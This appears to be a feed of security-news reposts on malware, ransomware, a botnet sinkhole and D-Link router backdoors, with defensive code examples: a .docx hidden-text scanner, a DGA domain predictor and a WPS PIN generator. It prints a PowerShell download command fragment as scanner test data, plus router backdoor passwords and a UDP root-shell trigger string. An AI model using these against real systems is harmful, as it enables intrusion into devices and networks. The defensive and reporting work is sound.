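    """Scan the body, headers and footers of a .docx held in memory.

    Returns one finding per tiny run: part name, point size, the hidden
    text and whether it matches the download/unzip tokens.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            for points, text in tiny_runs(zf.read(name)):
                findings.append({
                    "part": name,
                    "points": points,
                    "text": text,
                    "suspicious": bool(SUSPICIOUS.search(text)),
                })
    return findings


def build_sample_docx():
    """Build a minimal constructed archive with the parts the scanner reads.

    It is not a complete Word file (no [Content_Types].xml or relationships);
    it only needs enough structure to exercise scan_docx.
    """
    def run(text, half_points):
        return (f'<w:r><w:rPr><w:sz w:val="{half_points}"/></w:rPr>'
                f'<w:t xml:space="preserve">{text}</w:t></w:r>')

    body = (f'<w:document xmlns:w="{W_NS}"><w:body><w:p>'
            f'{run("Please enable macros to view this document", 22)}'
            '</w:p></w:body></w:document>')
    # Header carrying the command fragments at 1 point (w:sz 2), as on the page.
    header = (f'<w:hdr xmlns:w="{W_NS}"><w:p>'
              f'{run("powershell DownloadFile payload.zip copyhere 16", 2)}'
              '</w:p></w:hdr>')
    # Footer with benign 2-point text: flagged as tiny, but not suspicious.
    footer = f'<w:ftr xmlns:w="{W_NS}"><w:p>{run("draft watermark", 4)}</w:p></w:ftr>'

    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/document.xml", body)
        zf.writestr("word/header1.xml", header)
        zf.writestr("word/footer1.xml", footer)
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_docx(build_sample_docx()):
        flag = "SUSPICIOUS" if f["suspicious"] else "tiny"
        print(f'{flag:10} {f["part"]:20} {f["points"]:.1f}pt  {f["text"]!r}')
```

Tiny text on its own is not proof of anything (watermarks and legal boilerplate are often small), which is why the scanner reports the size and the token match separately; the combination of a sub-2-point run in a header part and download/unzip keywords is the pattern worth alerting on.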

Different Approaches, Same Hancitor

Although there are differences between the second and third approaches to distributing Hancitor, the objective of the threat actor is the same, as we found the same command and control server being used in both approaches.

However, the command and control servers of the second Hancitor approach show a minor change compared with those of the first approach: the URLs end in ls5/gate.php instead of ls4/gate.php, as seen in Figure 12.

Figure 12: Earlier and newer Hancitor gates

Stage 3: First stage payload

The file copies itself to “%system32%” and creates a registry run key entry for persistence. Upon execution, it communicates with an attacker-controlled website to download a variant of the Pony malware, “pm.dll”, along with a standard Vawtrak trojan.

Stage 4: Second stage payload (Pony) data exfiltration capabilities

We observed a number of data theft capabilities in the second stage Pony variant, including:

1) Stealing autocomplete Intelliforms data, which may include user passwords, as seen in Figure 13.

Figure 13: Stealing the content of the Intelliforms registry key

2) The unique GUID seen in Figure 14 is used to decrypt credentials from the credential store. There is a good amount of documentation on various forums on how this salted value is used to access credentials.

Figure 14: Credential stealing

3) Accessing Mozilla saved passwords from “signons.txt,” as seen in Figure 15.

Figure 15: Accessing Mozilla saved passwords

4) Figure 16 shows the malware code related to theft via accessing Microsoft OMI email configuration information. We can also see the malware accessing the registry entries that store the Outlook profile, which records where emails and other data are stored.

Figure 16:  Malware code for Outlook data theft via registry access

Conclusion

The malware authors responsible for Hancitor have developed several capabilities within malicious macros that support malware installation and data theft. These capabilities include leveraging uncommon APIs and obscuring malicious PowerShell commands, tactics that make detection more challenging.

Source:https://www.fireeye.com/


The post HANCITOR DOWNLOADER ABUSING APIS, POWERSHELL COMMANDS appeared first on Information Security Newspaper.

Unlock92 Ransomware Is the Quiet Threat That Nobody Heard About


Unlock92 infections going under the radar. A ransomware variant that appeared in early July this year and was initially cracked and decrypted has quietly resurfaced in mid-August and has been spamming users ever since, with a determination seen only in the market’s top ransomware families.

Known as Unlock92, this ransomware was in the media’s attention for a hot second, the time security researchers needed to crack its encryption algorithm and release a free decrypter to help victims recover their files.

While the vast majority of ransomware coders would give up on their code by this point, the Unlock92 team has continued to work on their craft, and returned with new versions, with much stronger encryption, which the free decrypter couldn’t handle.

First (weak) versions of Unlock92 seem to have been an accident

If we look at the big picture, the first Unlock92 version, the one that used weak encryption, seemed to be a fluke. The same gang behind Unlock92 had previously created the Kozy.Jozy ransomware, which used a strong RSA-2048 encryption system to lock the user’s files.

This same RSA-2048 system was later ported to current Unlock92 versions after researchers cracked the first variant. It looks like the first Unlock92 versions were only a test, and used a weaker encryption by accident, or intentionally, with the group fully capable of deploying a much stronger data encryption system at will.

You can easily recognize the first Unlock92 versions by the CRRRT extension they add to the end of all encrypted files. The later variants, the ones that can’t be decrypted, use the LOCKED or CCCRRRPPP extensions.

Files locked by Unlock92 ransomware

MalwareHunterTeam, an independent security researcher that has been keeping an eye on this ransomware since it came out, says the group behind this ransomware is very active, releasing new versions on a regular basis.

“They are very active. Every 1-2 days there’s a new sample,” he said. “The actor(s) behind this have not given up after a few samples like most of skids.”

“Actually, if you don’t count the big ones like Locky, Cerber, CryptXXX, and the ransomware kits, you won’t find much ransomware projects which keep going for months like this,” MalwareHunterTeam added.

Unlock92 targets only Russian-speaking users

The researcher is not the only one that has seen a rise in activity from this ransomware. The Dell Sonicwall Threat Research team has also detected a spike in the number of Unlock92 detections, for which it issued an alert on September 9.

The good news, or good for some of our readers, is that Unlock92 currently targets only Russian-speaking users.

Ransom notes are available in Russian only. This includes all the TXT files Unlock92 leaves on infected computers, on the user’s desktop and in the Start Menu. A rough translation of the Unlock92 ransom note is as follows:

Your files are encrypted cryptographically with the RSA-2048 algorithm. If you want to recover them, send one of the encrypted files and the keyvalue.bin file to the e-mail address: unlock92@india.com. If you do not receive a reply within 24 hours, then download the TOR browser from www.torproject.com and visit the following website: hxxp://ezxxxxxxxxxxxxxx.onion – the most current email address will be listed there. It is not possible to visit this website without a TOR browser. Attempts to self-recover files may irreversibly damage them!

Since there aren’t any geo-targeting filters in Unlock92’s source code, the group behind this threat appears to be targeting its victims by using batches of email addresses belonging to Russian users. It would take very little effort for the group to translate the ransom notes into English and start targeting users all over the world, without any modification to the ransomware’s source code.

Ransom note files added to the victim's Start Menu
Source:http://news.softpedia.com/

The post Unlock92 Ransomware Is the Quiet Threat That Nobody Heard About appeared first on Information Security Newspaper.

Introducing Her Royal Highness, the Princess Locker Ransomware


Today we bring you Princess Locker, the ransomware only royalty could love. First discovered by Michael Gillespie, Princess Locker encrypts a victim’s data and then demands a hefty ransom of 3 bitcoins, or approximately $1,800 USD, to purchase a decryptor. If payment is not made within the specified timeframe, the ransom doubles to 6 bitcoins.

Not much is known about Princess Locker beyond a few encrypted files and ransom notes uploaded to ID-Ransomware. From what has been gathered, when a person is infected, the ransomware encrypts the victim’s files, appends a random extension to the encrypted files, and creates a unique ID for the victim. This ID, extension, and encryption information is then most likely sent to the ransomware’s Command & Control server.

Ransom notes are also created and displayed, named !_HOW_TO_RESTORE_[extension].TXT and !_HOW_TO_RESTORE_[extension].html.

These ransom notes contain the victim’s ID and links to the TOR payment sites where a victim can login to see payment information.

The Princess Locker Payment Site

The Princess Locker payment site is a standard ransomware site with no special features. When victims access it, they are greeted with a page asking them to select a language that looks almost identical to Cerber’s language selection page.

Language Selection Screen

They will then be presented with a login prompt where they need to enter the victim ID provided in the ransom note.  Once logged in they will see the main payment site, which contains information such as the ransom amount, the bitcoin address to send payment to, and the answers to common questions.

Princess Locker Payment Site

The payment site also offers to decrypt one file for free. Unfortunately, since we do not have a sample of the ransomware, and I didn’t want to waste a victim’s free decryption, I do not know whether this feature works.

Free File Decryption

The one item missing from the payment site is a support page that victims can use to contact the malware developers. If this ransomware goes into wider distribution, I would not be surprised to see one added.

We are still actively looking for a sample of this ransomware, so if one is encountered.

Source:http://www.bleepingcomputer.com/


The post Introducing Her Royal Highness, the Princess Locker Ransomware appeared first on Information Security Newspaper.

Cisco Sinkholes GozNym Banking Trojan Botnet


GozNym botnet included over 23,000 infected victims. The Cisco Talos team has announced today that they’ve successfully managed to sinkhole one of GozNym’s botnets and are in the process of doing the same to three others.

Researchers say they were able to divert traffic from the GozNym botnet after they managed to crack the domain generation algorithm (DGA) used by the banking trojan to communicate with its ever-changing C&C master servers.

All banking trojans today, and other types of top-shelf malware, use DGAs to allow infected hosts to communicate with C&C servers that change on a daily basis.

Cracking the DGA is the quickest way to sinkhole malware operations

A DGA uses various input data to generate a seemingly random domain name to which the infected host connects. Because the crooks know how the algorithm behaves, they know which domain name is generated on each day, and host servers on those domains in advance in order to manage the botnet on that specific day.

If researchers manage to crack the DGA, they also know what the algorithm will generate, and can take over those domains from crooks, with the help of law enforcement, domain registrars, and hosting providers.

Something similar happened in July when researchers from Arbor Networks cracked the DGA of the Mad Max malware and sinkholed all the C&C servers it was bound to use until the end of the year, effectively taking down the botnet.
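The sinkholing logic described above, as an added example that is not Cisco Talos code and not GozNym's real algorithm: the DGA here is a hypothetical stand-in (a SHA-256 of the date and an index, mapped to letters) that illustrates the mechanism. Once an algorithm is known, a defender can enumerate every domain it will produce for a window of days, hand that list to registrars and law enforcement for sinkholing, and in the meantime match it against DNS query logs to find infected hosts. The DNS log lines are constructed.

```python
"""Predict a date-seeded DGA's domains and match them against DNS logs.

Added example, not Cisco Talos code and not GozNym's real algorithm: the
DGA here is a hypothetical stand-in (SHA-256 of the date and an index) that
shows the mechanism the page describes. The DNS log lines are constructed.
"""
import hashlib
from datetime import date, timedelta

TLDS = ("com", "net", "org")
DOMAINS_PER_DAY = 5
DEMO_START = date(2016, 9, 1)   # constructed window start for the demo


def toy_dga(day, count=DOMAINS_PER_DAY):
    """Return the domains the hypothetical DGA yields for one calendar day."""
    domains = []
    for i in range(count):
        digest = hashlib.sha256(f"{day.isoformat()}#{i}".encode()).digest()
        label = "".join(chr(ord("a") + b % 26) for b in digest[:12])
        domains.append(f"{label}.{TLDS[digest[12] % len(TLDS)]}")
    return domains


def predict_domains(start, days, count=DOMAINS_PER_DAY):
    """Map every domain the DGA will produce over a window to its activation day.

    This is the list a defender registers or sinkholes ahead of the botnet.
    """
    predicted = {}
    for offset in range(days):
        day = start + timedelta(days=offset)
        for domain in toy_dga(day, count):
            predicted[domain] = day
    return predicted


def match_dns_log(lines, predicted):
    """Return (client, domain, activation_day) for queries hitting predicted domains.

    Constructed log format: '<timestamp> <client-ip> <queried-name>'.
    """
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) != 3:
            continue            # malformed line: skip rather than crash
        _, client, qname = parts
        qname = qname.lower().rstrip(".")
        if qname in predicted:
            hits.append((client, qname, predicted[qname]))
    return hits


def demo():
    """Predict 30 days of domains and find the one infected host in a constructed log."""
    predicted = predict_domains(DEMO_START, days=30)
    day3_domain = toy_dga(DEMO_START + timedelta(days=2))[0]
    log = [
        f"2016-09-03T10:00:01Z 10.0.0.5 {day3_domain}.",       # constructed hit
        "2016-09-03T10:00:02Z 10.0.0.6 www.example.com.",      # benign
        "2016-09-03T10:00:03Z 10.0.0.7 update.example.net",    # benign
        "garbage line",                                        # malformed
    ]
    return match_dns_log(log, predicted)


if __name__ == "__main__":
    for client, domain, day in demo():
        print(f"{client} queried DGA domain {domain} (scheduled for {day})")
```

The same prediction table doubles as a blocklist for a resolver or proxy; the important operational detail is the window size, since a DGA that takes the date as its only input lets you precompute as far ahead as you like, exactly what let the Mad Max sinkhole mentioned below cover the rest of the year.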

GozNym shined bright like a falling star

GozNym is a new banking trojan that appeared this year in April and is a hybrid malware family made up of code taken from the Gozi and Nymaim trojans.

The trojan established itself as a threat from the get-go, with a diverse arsenal of tools and tricks which included support for both webinjects (browser and application process injection) and redirection attacks (malicious proxy redirecting users to fake banking sites). This is something out of the ordinary, with very few banking trojans using both methods at once, usually opting just for one.

Besides being highly complex, code-wise, the trojan was also backed by vicious spam campaigns that spread their payload all over Japan, Europe, and North America.

Development on the trojan was so far ahead of other similar malware that in August, buguroo detected some features in GozNym’s code to bypass some types of behavioral biometrics defenses found on some modern banking portals.

According to data gathered from the first sinkholed botnet, Cisco says it detected 23,062 infected hosts so far, with most of them located in Germany, the US, Poland, Canada, and the UK, all classic GozNym targets.

GozNym botnet analysis (by IP per country)
Source:http://news.softpedia.com/

The post Cisco Sinkholes GozNym Banking Trojan Botnet appeared first on Information Security Newspaper.


Vulnerabilities, Backdoors Found in D-Link Mobile Hotspot


Security researchers have discovered numerous unpatched security vulnerabilities in the D-Link DWR-932B LTE router / access point, including backdoor accounts and default Wi-Fi Protected Setup (WPS) PIN.

The device is being sold in various countries and appears to be customers’ security nightmare because of the numerous security weaknesses. The vulnerabilities were discovered by Pierre Kim, who decided to reveal only the most significant of them, and who says that the issues affect even the latest firmware version released by the vendor.

Earlier this year, Kim disclosed numerous unpatched vulnerabilities affecting the LTE QDH routers made by Quanta, including backdoors, hardcoded PIN, flaws in the web interface, remote code execution issue, and other bugs. The flaws that impact D-Link’s router are similar to those found in Quanta’s device, it seems.


The researcher discovered two backdoor accounts on the device and says that they can be used to bypass the HTTP authentication used to manage the router. There is an “admin” account with password “admin,” as well as a “root” account, with password “1234.” By default, telnetd and SSHd are running on D-Link DWR-932B, yet the latter isn’t documented, the researcher also explains.

Next, there is a backdoor inside the /bin/appmgr program, which allows an attacker to send a specific string over UDP to the router to start an authentication-less telnet server (if a telnetd daemon is not already running). The router listens on 0.0.0.0:39889 (UDP) for commands and grants root access without authentication when it receives the command “HELODBG”.

D-Link DWR-932B also ships with 28296607 as the default WPS PIN, hardcoded in the /bin/appmgr program. The HostAP configuration contains the PIN as well, and so do the HTTP APIs. What’s more, although the router lets the user generate a temporary PIN for the WPS system, that PIN is weak: the generation algorithm uses srand(time(0)) as its seed, so an attacker who knows the current date and time can generate the set of valid WPS PINs and brute-force them, the researcher explains.
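To make the seeding problem concrete, here is an added example (not Pierre Kim's code and not the DWR-932B firmware) that puts a clock-seeded PIN generator beside a hardened one. Python's random.Random seeded with an epoch second stands in for C's srand(time(0))/rand(), and the secrets module stands in for an OS CSPRNG. Both generators produce well-formed 8-digit WPS PINs, whose last digit is the standard WPS checksum over the first seven; the checksum routine is the standard rule, and the page's default PIN 28296607 passes it.

```python
"""Compare a time-seeded WPS PIN generator with a CSPRNG-backed one.

Added example, not Pierre Kim's code or the DWR-932B firmware. The weak
generator mirrors the srand(time(0)) pattern the page describes, using
Python's random.Random seeded with an epoch second as a stand-in for C's
rand(); the hardened generator uses the secrets module. The last of the
8 PIN digits is the standard WPS checksum over the first 7.
"""
import random
import secrets
import time


def wps_pin_checksum(pin7):
    """Checksum digit for a 7-digit WPS PIN body (standard WPS rule)."""
    accum = 0
    while pin7:
        accum += 3 * (pin7 % 10)
        pin7 //= 10
        accum += pin7 % 10
        pin7 //= 10
    return (10 - accum % 10) % 10


def wps_pin_valid(pin8):
    """True if an 8-digit PIN's last digit matches the checksum of its first seven."""
    return 0 <= pin8 < 100_000_000 and wps_pin_checksum(pin8 // 10) == pin8 % 10


def weak_pin(epoch_second):
    """WEAK: seeded only by the clock, so the same second yields the same PIN.

    Anyone who can estimate when the PIN was generated can regenerate the
    small set of candidates, which is the flaw the advisory describes.
    """
    rng = random.Random(epoch_second)        # stand-in for srand(time(0))
    body = rng.randrange(10_000_000)         # stand-in for rand() % 10000000
    return body * 10 + wps_pin_checksum(body)


def strong_pin():
    """HARDENED: the PIN body comes from the OS CSPRNG, so there is no seed to guess."""
    body = secrets.randbelow(10_000_000)
    return body * 10 + wps_pin_checksum(body)


def pins_identical_for_same_second(epoch_second):
    """Show the failure mode: two 'fresh' PINs drawn in the same second are identical."""
    return weak_pin(epoch_second) == weak_pin(epoch_second)


if __name__ == "__main__":
    now = int(time.time())
    print("weak  :", weak_pin(now), "(reproducible from seed", now, ")")
    print("strong:", strong_pin())
    print("default PIN 28296607 has a valid WPS checksum:", wps_pin_valid(28296607))
```

A practical use of the checksum routine on the defensive side is auditing: PINs a device hands out can be checked for structure, and a generator that returns the same PIN when called twice in the same second (the pins_identical_for_same_second check) is seeded from the clock and should be replaced with a CSPRNG-backed one.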

Kim also reveals that the file /etc/inadyn-mt.conf contains a user and a hardcoded password, and that the HTTP daemon /bin/qmiweb contains multiple vulnerabilities as well. The router also executes strange, purposeless shell commands as root.

Furthermore, the router supports remote FOTA (Firmware Over The Air) and keeps the credentials used to contact the update server hardcoded in the /sbin/fotad binary as base64 strings. The researcher found that, although the FOTA daemon tries to retrieve the firmware over HTTPS, the SSL certificate has been invalid for a year and a half.

The researcher also reveals that the security level of the UPnP program (miniupnp) in the router is lowered, which allows an attacker on the LAN to add port forwarding rules from the Internet to other clients on the LAN. “There is no restriction about the UPnP permission rules in the configuration file, contrary to common usage in UPnP where it is advised to only allow redirection of port above 1024,” Kim notes.

Because of this lack of permission rules, an attacker can forward everything from the WAN into the LAN, the researcher says. This means that they can set rules to allow traffic from the Internet to local Exchange servers, mail servers, FTP servers, HTTP servers, database servers, and the like.
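The permission rules Kim refers to, shown here as an added configuration example (not taken from the D-Link firmware or from the advisory): miniupnpd's allow/deny rules each take an external port range, a client subnet and an internal port range, are evaluated in order, and the first matching rule decides. The LAN subnet 192.168.1.0/24 is a placeholder for whatever the router serves.

```conf
# WEAK: the state the page describes. With no allow/deny lines at all,
# any LAN client may map any WAN port to any LAN host and port, so an
# attacker on the LAN can expose internal mail, FTP, HTTP or database
# servers to the Internet.
#
# (no permission rules)

# HARDENED: the usual miniupnpd.conf pattern. LAN clients may only map
# high ports (above 1024) to high ports on the placeholder LAN subnet;
# everything else is denied. Order matters: the allow line must come
# before the catch-all deny.
allow 1024-65535 192.168.1.0/24 1024-65535
deny 0-65535 0.0.0.0/0 0-65535

# Optional extra restriction: a client may only add mappings that point
# at its own IP address, not at other hosts on the LAN.
secure_mode=yes
```

With these rules in place, a request to forward external port 25 or 445 to an internal server is refused outright, and a client cannot create mappings for other hosts even within the allowed range when secure_mode is on.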

An attacker can overwrite the router’s firmware with a custom firmware if they wanted to, “but with all these vulnerabilities present in the default firmware, I don’t think it is worth making the effort,” Kim says. He also notes that, because the device has a sizable memory (168 MB), a decent CPU, and good free space (235 MB), along with complete toolkits installed by default, users should consider trashing it, “because it’s trivial for an attacker to use this router as an attack vector.”

D-Link was informed of these issues in June, but the company has not resolved them so far. Because 90 days have passed since the vulnerabilities were disclosed to the vendor, Kim decided to publish an advisory revealing these bugs.

This is not the first time D-Link products have made headlines because of security vulnerabilities. The company patched a critical flaw in several DIR model routers in August, after a popular D-Link Wi-Fi camera was found in June to be affected by a serious flaw that was subsequently discovered in over 120 D-Link products.

Source:http://www.securityweek.com/


The post Vulnerabilities, Backdoors Found in D-Link Mobile Hotspot appeared first on Information Security Newspaper.

Bitter Ransomware Operator Shuts Down Service and Deletes Decryption Master Key


Misconfigured server led to Encryptor RaaS’ downfall. After law enforcement seized servers belonging to Encryptor RaaS, a Ransomware-as-a-Service cyber-crime portal, the site’s operators decided to close it down for good over the summer and deleted the master decryption key that would have allowed victims to recover their files.

This action by the Encryptor RaaS owner has left countless victims in the unpleasant position of not being able to decrypt their files, even if they were willing to pay.

Trend Micro and law enforcement shut down Encryptor RaaS

According to an investigation from security firm Trend Micro, the Encryptor RaaS service, which launched in July 2015, started to unravel exactly one year later, in July 2016.

The security vendor says the admin was careless and left one of the servers that stored information about the RaaS service unprotected online, without being hidden using the Tor service.

Trend Micro says that the server, named “Encryptor RaaS Decryptor,” was easy to discover via Shodan, and anyone knowing what to look for would have found it very easily.

The security vendor didn’t waste time and tipped off US and European law enforcement agencies, which contacted the cloud provider where the server was hosted and had it seized.

Bitter Encryptor RaaS admin deletes master key

At that point, the Encryptor RaaS admin immediately shut down the service. After two failed attempts in the next four days to revive his portal, and after law enforcement seized three more of his production servers, he finally decided to give it up.

Annoyed by the fact that law enforcement had effectively shut down his money-making operation, the crook announced he wouldn’t be releasing anything to help victims, neither the ransomware’s source code, nor the master key, which can unlock any of the infected victims’ data.

Encryptor RaaS shutdown announcements

As a comparison, when the TeslaCrypt ransomware decided to shut down (for unknown reasons), its operators released the master decryption key, so that victims who didn’t pay could recover their files.

Encryptor RaaS was a very popular service

For the time it was online, Encryptor RaaS was one of the most popular RaaS services, mainly because its creator took only a 5 percent cut, compared to other services that asked between 20 and 40 percent.

Additionally, the service received regular updates, and its creator had heavily invested in anti-AV detection measures, such as the purchase and usage of stolen digital certificates.

Encryptor was also popular because, besides the Windows variant of the ransomware, the service provided a Linux version for locking web servers.

Is RaaS a successful criminal business model?

Encryptor’s takedown also marks the first time Trend Micro has shut down a RaaS service.

“It’s a fairly new business model, but the fact that it went away so quickly is reason to be cautiously optimistic that public private partnerships and LE [law enforcement] actions […] will make it an infeasible business model,” said Rik Ferguson, VP Security Research at Trend Micro.

“It doesn’t seem to be a particularly attractive or sustainable model for ransomware,” he also adds about RaaS services. “Not if the affiliates are intelligent anyway.”

Encryptor RaaS server available via Shodan
Source:http://news.softpedia.com/

The post Bitter Ransomware Operator Shuts Down Service and Deletes Decryption Master Key appeared first on Information Security Newspaper.

Kaspersky decrypts Ransomware from TeamXRat


Kaspersky posted a great article about their TeamXrat Ransomware analysis and how they were able to create a decryptor for its victims.  Reported back in mid September in our forums, I and other security researchers were never able to find an actual sample of the malware.  It turns out that this was because the ransomware is being manually installed via hacked RDP services and then manually cleaned up after the installation is finished.

Installed via Hacked Remote Desktop Services

According to Kaspersky, this ransomware, which they have named the Xpan Ransomware, is created by a Brazilian cybergang that goes by the name TeamXrat or CorporacaoXRat. This group targets servers and computers running Remote Desktop Services and attempts to brute-force passwords to gain access. Once in, they manually install the ransomware and encrypt the victim’s data.

Depending on the version of the ransomware, when the files are encrypted they will have the ___xratteamLucked or the ____xratteamLucked extension appended to the filenames.  A ransom note will also be created called Como descriptografar os seus arquivos.txt. This file name translates from Portuguese to English as How to decrypt your files.

Below is an example of this ransom note:

Xpan/TeamXrat Ransomware Ransom Note
Source: TeamXRat: Brazilian cybercrime meets ransomware

The ransomware will also change the desktop wallpaper to the following image.

Desktop Wallpaper

Victims are then asked to email the ransomware developers in order to get payment instructions, where the developers ask for a 1 bitcoin ransom payment. Emails that Kaspersky reports have been associated with this ransomware are xRatTeam@mail2tor.com and corporacaoxrat@mail2tor.com.

Kaspersky to the Rescue

The good news is that Kaspersky was able to crack the encryption used by the Xpan Ransomware / TeamXrat Ransomware. For those who have been affected by this ransomware and whose encrypted files end with the ___xratteamLucked (3 underscores) or the ____xratteamLucked (4 underscores) extension, do not pay the ransom! Instead you can contact Kaspersky at their support page.

Kaspersky Decryptor
Source: TeamXRat: Brazilian cybercrime meets ransomware

It is unknown if Kaspersky is charging for this service, but in the past they have released their decryptors for free. My guess is that they are not making the decryptor publicly available to prevent TeamXrat from learning the weakness in their encryption algorithm.

Source:http://www.bleepingcomputer.com/


The post Kaspersky decrypts Ransomware from TeamXRat appeared first on Information Security Newspaper.

Spy Tech ‘Hacks WhatsApp Encrypted Chat From A Backpack’


An Israeli company is marketing what appears to be an astonishing surveillance capability, claiming it can siphon off all WhatsApp chats, including encrypted communications, from phones within close proximity of a hidden Wi-Fi hacking device in a backpack.

Brochures leaked to FORBES, and published below, revealed a non-public offering from Haifa-based Wintego called CatchApp. It promises an “unprecedented capability” to break through WhatsApp encryption and grab everything from a target’s account. It does so through a “man-in-the-middle” (MITM) attack; in theory the traffic is intercepted between the app and the WhatsApp server and somehow the encryption is decoded by the device, though that may not be possible with the latest upgrades to the software’s cryptography.

According to the anonymous source who handed FORBES the documents, the product works on the most current versions of WhatsApp, noting the brochures were handed out at a policing event this year. They could not offer any proof of that claim, however, and the files may date from before WhatsApp added significantly stronger end-to-end encryption.

WhatsApp, owned by Facebook, started deploying end-to-end encryption with the much-respected Signal protocol in late 2014. But the full rollout wasn’t complete until April this year. The Wintego brochure is no older than April 2015, the date the literature cites for its figure of 800,000 WhatsApp users. WhatsApp hit one billion users in February 2016, however, begging the question: why not use the more current figure?

Is it possible?

The CatchApp feature can be delivered from Wintego’s WINT product, a hacking device that fits snugly into a backpack, according to the documents. Other brochures handed to FORBES claimed the WINT “data extraction solution” can obtain “the entire contents of your targets’ email accounts, chat sessions, social network profiles, detailed contact lists, year-by-year calendars, files, photos, web browsing activity, and more.” It does that by acquiring login credentials for individual accounts and then silently downloading “all the data stored therein”.

WINT’s Cyber Data Extractor can overcome “the encryption and security measures of many web accounts and apps” to grab those credentials, Wintego claimed. Where no credentials are required – with chat apps like WhatsApp and, presumably, Facebook Messenger, Google Allo, Telegram, etc. – the Extractor can pilfer “secured data right from the apps.”

Wintego claims WINT first gains access to a device by intercepting Wi-Fi communications, whether they’re open or private encrypted networks. WINT uses four separate Wi-Fi access points so it can track multiple targets and high-gain antennas to catch those at a distance. It’s small enough to fit into any backpack, said Wintego, so is ideal for stealthy operations.

Security experts aren’t convinced Wintego’s kit is as powerful as advertised, though, and it shouldn’t be possible to crack open WhatsApp using the firm’s techniques. It may be, suggested Jonathan Zdziarski, that the CatchApp tech is exploiting Secure Sockets Layer (SSL) encryption. “I suspect they’re taking advantage of a number of vulnerabilities in SSL implementations… many systems are susceptible to downgrade attacks and other types of MITMs.” SSL is no longer in use in the Signal protocol, however, replaced recently by an alternative called Noise. But many other chat apps continue to use SSL.

Another possibility is that CatchApp is malware thrust onto a device over Wi-Fi that specifically targets WhatsApp. But it’s almost certain the product cannot crack the latest standard of WhatsApp cryptography, said Matthew Green, a cryptography expert and assistant professor at the Johns Hopkins Information Security Institute. Green, who has been impressed by the quality of the Signal code, added: “They would have to defeat both the encryption to and from the server and the end-to-end Signal encryption. That does not seem feasible at all, even with a Wi-Fi access point.

“I would bet mundanely the password stuff is just plain phishing. You go to some site, it asks for your Google account, you type it in without looking closely at the address bar.

“But the WhatsApp stuff manifestly should not be vulnerable like that. Interesting.”

Neither WhatsApp nor the crypto whizz behind Signal, Moxie Marlinspike, was willing to comment unless more specific details were revealed about the tool’s capability. Either Wintego is embellishing its real capability, or it has a set of exploits that the rest of the world doesn’t yet know about.

Wintego in Taiwan

Wintego was founded by alumni of Verint, another Israeli firm, but one that’s become a dominant force in the surveillance sphere, most notably as a provider for America’s National Security Agency (NSA).

Yuval Luria acts as the face of the company, promoting the kit at major surveillance shows. He recently presented at the ISS World Training event in Prague (also known as the Wiretappers’ Ball), giving a talk on A Hybrid Tactical-Strategic Approach for Extracting Cyber Intelligence. Nhevo Kaufman appears to act as company chief, having set up the firm’s website back in 2011.


Wintego chiefs Nhevo Kaufman (left) and Yuval Luria (right). Photos from their respective LinkedIn profiles.

Possibly in an attempt to keep their identities under wraps, neither publicly notes an affiliation with Wintego on their respective LinkedIn profiles. Instead, Luria lists no company at all, whilst Kaufman is the founder and CEO of NK Business Ventures (NK-BV), a company that has no public website and about which there is little to no public information. FORBES believes NK-BV is the parent of Wintego, or a sales arm for the company and others in the industrial surveillance complex.

In a brief conversation with FORBES, Kaufman could not confirm that, nor could he say whether the CatchApp tool still worked against the most current version of WhatsApp. He declined to offer any specific information about the provider. “Any specific details about products is in contrary to the sensitivity of the products due to the customers that are using them,” Kaufman added.

“I’m not interested in giving any specific details. I would jeopardise the sensitive issues of our customers who are using products like this. Naturally they’re customers that are governmental customers… referring to specific details of the product is not something that would be appropriate to put in an article like this.”

The most revealing information about NK Business Ventures can be found in the Wikileaks-hosted files leaked from spyware provider Hacking Team. Luria, in discussions about forming a partnership between NK-BV and Hacking Team, noted: “The company represents several key customers and integrators in different countries, providing security and intelligence solutions from both the Israeli market and the international market.”

In the thread, dated October 2012, Luria reveals the company represents Taiwan, though he doesn’t disclose the name of the body he worked with. By the end of that conversation, a deal with Hacking Team – a company criticised for selling invasive tools to countries with weak human rights records – is all but confirmed. “In his words the opportunity seems very concrete and if we want to try to visit the client on Wednesday 31 October straight after Macao we need to send him asap the Dealer Agreement,” wrote Hacking Team’s Singapore representative Daniel Maglietta. There was, however, no further open email communication between the two parties.

Wintego is, then, another member of the highly secretive surveillance industry and of Israel’s elite professional spy sector. It has a number of equally reticent competitors in the Wi-Fi intercept game, including two firms FORBES encountered at the Milipol event in Paris last November: Israel’s Rayzone and China’s Long Hope. Ability Inc., a provider of network exploitation capabilities that promises to spy on any device with just a telephone number for $20 million, ranked Wintego as one of its competitors too.

As with Hacking Team, human rights experts are worried about who is watching over exports of such powerful technology and if it’s being used responsibly. “Wintego continue to position themselves as a global threat to individuals privacy, creating technology like CatchApp to attack WhatsApp, a messaging app that is used by diplomats, journalists and the general public alike,” said Christopher Weatherhead, technologist at Privacy International.

“Although it appears unclear from the documents the efficacy of this technology, it is useful to understand possible weaknesses in the software and how it can betray us. Which could allow a slew of nefarious characters such as hackers and malware companies to gain access to people’s communications.”

Source:http://www.forbes.com/

KNOWLEDGE BELONGS TO THE WORLD

The post Spy Tech ‘Hacks WhatsApp Encrypted Chat From A Backpack’ appeared first on Information Security Newspaper.

Hacked Steam accounts spreading Remote Access Trojan


Yesterday, I stumbled on a post where a Reddit user named Haydaddict was alerting people about some hacked Steam accounts spreading malware. As I am always interested in new malware, I took a look to see what could be discovered.

According to the post, the hacked accounts were being used to spam suspicious links through Steam chat. These chat messages told the recipient to go to videomeo.pw to watch a video.

Steam Chats

When the target went to the page, they would be greeted with a message stating that they needed to update Flash Player in order to watch the video.

Fake Video Page

If a target downloads the installer and executes it, they will find that it does not appear to do anything. This is because the “Flash Player installer” is actually a Trojan that executes a PowerShell script called zaga.ps1, which downloads a 7-Zip archive, a 7-Zip extractor, and a CMD script from the zahr.pw server.

Zaga.ps1 PowerShell Script

Once the files are downloaded, the PowerShell script launches the CMD file, which extracts the archive to the %AppData%\lappclimtfldr folder and configures Windows to automatically start the mcrtvclient.exe program when a user logs in. This program is actually a renamed copy of the NetSupport Manager Remote Control Software.

When the program is launched, it will connect to the NetSupport gateway at leyv.pw:11678 and await commands. This allows the attacker to remotely connect to the infected computer and take control over it.

NetManager Configuration File

